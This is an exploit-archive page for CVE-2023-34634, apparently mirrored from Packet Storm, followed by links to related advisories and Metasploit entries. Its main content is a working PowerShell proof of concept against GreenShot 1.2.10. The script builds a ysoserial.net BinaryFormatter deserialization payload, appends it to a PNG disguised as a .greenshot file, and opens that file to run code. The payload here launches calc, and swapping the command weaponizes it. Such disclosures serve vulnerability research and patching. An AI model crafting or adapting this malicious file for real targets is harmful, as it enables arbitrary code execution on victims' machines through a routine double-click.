Lucene search
P4r4bellumPACKETSTORM:173825HistoryJul 31, 2023 - 12:00 a.m.
GreenShot 1.2.10 Arbitrary Code Execution
2023-07-3100:00:00
p4r4bellum
packetstormsecurity.com
147
exploit
vendor
software
version
cve
object deserialization
arbitrary code execution
windows
payload
png file
powershell
invoke-item
EPSS
0.923
Percentile
99.0%
`# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Date: 26/07/2023
# Exploit Author: p4r4bellum
# Vendor Homepage: https://getgreenshot.org
# Software Link: https://getgreenshot.org/downloads/
# Version: 1.2.6.10
# Tested on: windows 10.0.19045 N/A build 19045
# CVE : CVE-2023-34634
#
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
# will lead to arbitrary code execution
#
# Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw
#load the payload
$payload = Get-Content .\payload.bin -Encoding Byte
# retrieve the length of the payload
$length = $payload.Length
# load the required assembly to craft a PNG file
Add-Type -AssemblyName System.Drawing
# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
$filename = "$home\poc.greenshot"
$bmp = new-object System.Drawing.Bitmap 250,61
$font = new-object System.Drawing.Font Consolas,24
$brushBg = [System.Drawing.Brushes]::Green
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
$graphics.Dispose()
$bmp.Save($filename)
# append the payload to the PNG file
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the length of the payload
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the signature
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
# launch greenshot. Calc.exe should be executed
Invoke-Item $filename
`
Related
zdt
zdt
Greenshot 1.3.274 Deserialization / Command Execution Exploit
2023-08-17 00:00:00
nvd
nvd
CVE-2023-34634
2023-08-01 14:15:10
prion
prion
Design/Logic Flaw
2023-08-01 14:15:00
osv
osv
CVE-2023-34634
2023-08-01 14:15:10
metasploit
metasploit
Greenshot .NET Deserialization Fileformat Exploit
2023-08-03 15:58:07
cvelist
cvelist
CVE-2023-34634
2023-08-01 00:00:00
cve
cve
CVE-2023-34634
2023-08-01 14:15:10
exploitdb
exploitdb
GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
2023-07-28 00:00:00
packetstorm
packetstorm
Greenshot 1.3.274 Deserialization / Command Execution
2023-08-17 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2023-08-18 17:22:46